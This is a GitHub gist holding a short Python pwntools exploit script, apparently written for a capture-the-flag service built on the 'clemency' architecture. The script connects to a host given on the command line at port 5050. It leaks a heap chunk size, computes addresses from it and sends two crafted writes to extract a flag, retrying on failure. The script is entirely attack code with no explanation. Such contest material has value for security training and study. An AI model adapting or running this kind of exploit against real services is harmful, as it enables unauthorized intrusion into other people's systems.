Skip to content

Instantly share code, notes, and snippets.

@elnx

elnx/half_ppp_new.py

Created August 2, 2017 07:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save elnx/8fb7fed78442164979d11a800058299f to your computer and use it in GitHub Desktop.
Save elnx/8fb7fed78442164979d11a800058299f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
half_ppp_new.py
#!/usr/bin/env python
# coding:utf-8
import sys
import time
from pwn import *
from clemency import *
def exploit(host):
i = 0
context.log_level = 'error'
port = 5050
while i < 100:
try:
p = remote(host, port)
p = cyio(p, True)
p.recvuntil('> ')
leak = hex(0xc400) + ' abs ps'
#log.info(leak)
p.sendline(leak)
chunksize = int(p.recvuntil('\n').strip())
p.recvuntil('> ')
chunk_base = chunksize + 0xc400 - 1
p1 = hex(0x8713)
p1 += ' '
p1 += hex(chunk_base + 0x12)
p1 += ' qq'
p2 = hex(0x4010000)
p2 += ' '
p2 += hex(chunk_base + 2233 + 1600)
p2 += ' qq +'
log.info(p1)
log.info(p2)
p.sendline('.')
p.recvuntil('> ')
p.sendline(p1)
p.recvuntil('> ')
p.sendline(p2)
flag = p.recvuntil('\n').strip().replace('[-] invalid: ','')
return flag
except:
i += 1
continue
if __name__ == '__main__':
#host = '10.5.12.2'
host = sys.argv[1]
print exploit(host)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment